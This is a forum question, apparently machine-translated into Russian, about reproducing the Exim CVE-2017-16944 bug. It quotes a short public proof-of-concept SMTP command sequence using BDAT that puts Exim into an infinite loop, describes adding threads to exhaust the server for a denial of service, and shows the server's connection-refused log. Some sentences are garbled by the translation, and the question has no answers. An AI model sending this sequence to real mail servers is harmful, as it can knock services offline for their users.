Как воспроизвести cve-2017-16944?

Я пытаюсь воспроизвести cve-2017-16944, но безуспешно. Я пишу опыт, обратитесь к этой статье 1: https://devco.re/blog/2017/12/11/Exim-RCE-advisory-CVE-2017-16943-en/, заставил exim войти в бесконечный цикл без сбоев, используя следующие команды.

# CVE-2017-16944 PoC by meh at DEVCORE

EHLO localhost
MAIL FROM:<meh@some.domain>
RCPT TO:<meh@some.domain>
BDAT 100
.
MAIL FROM:<meh@some.domain>
RCPT TO:<meh@some.domain>
BDAT 0 LAST

И я добавил потоки, которые хотели сделать DoS-атаку на основе ресурсов, а затем принудительно отключить весь сервер. Однако сервер показал, что слишком много подключений, и отказался как сброс:

3900 SMTP>> 421 Too many concurrent SMTP connections; please try again later.
3900 LOG: connection_reject MAIN
3900   Connection from [**********] refused: too many connections
3900 Listening...

Я не видел, чтобы в статье говорилось, что нужно изменить максимальное соединение, поэтому я не могу отключить сервер. Но он добавил, что seccess добавил новый ответвление на сервере в виде развертывающегося изображения: есть ссылка на изображение журнала. Здесь кто-то воспроизвел это Вульнарабилит раньше? И как у вас это получается? Можете ли вы показать более подробную информацию об этом?

0 ответов

Другие вопросы по тегам